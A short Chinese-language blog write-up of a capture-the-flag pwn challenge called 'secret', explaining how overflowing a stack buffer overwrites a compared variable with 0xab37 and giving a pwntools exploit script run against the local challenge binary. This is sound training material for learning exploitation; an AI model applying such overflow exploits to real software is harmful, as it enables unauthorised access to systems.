Pwnctf secret Writeup

kazma 成大資安社 創辦人/社長
  2024-01-09 19:49:31 2024-01-09 19:49:31 Created   2024-01-09 20:10:25 2024-01-09 20:10:25 Updated    

secret

我們先來看一下有哪些變數:
var
關鍵在他會比較 var_4h 是不是 0xab37:
0x4
我們要從 var_20h overflow 到 var_4h,然後送一個大寫 Y,就可以拿到 flag 了。

exploit.py

1
2
3
4
5
6
7
from pwn import *
context.arch = 'amd64'

r = process('./secret')
r.sendlineafter(b':', b'a'*0x1c + p64(0xab37))
r.sendlineafter(b')', "Y")
r.interactive()

Pwned !!!

  • Title: Pwnctf secret Writeup
  • Author: kazma
  • Created at : 2024-01-09 19:49:31
  • Updated at : 2024-01-09 20:10:25
  • Link: https://kazma.tw/2024/01/09/Pwnctf-secret-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwnctf secret Writeup
  1. secret